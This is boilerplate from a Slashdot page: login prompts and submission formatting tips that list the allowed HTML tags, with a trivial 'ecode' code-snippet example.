Load More Comments
Slashdot Login

Need an Account?

Forgot your password?

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>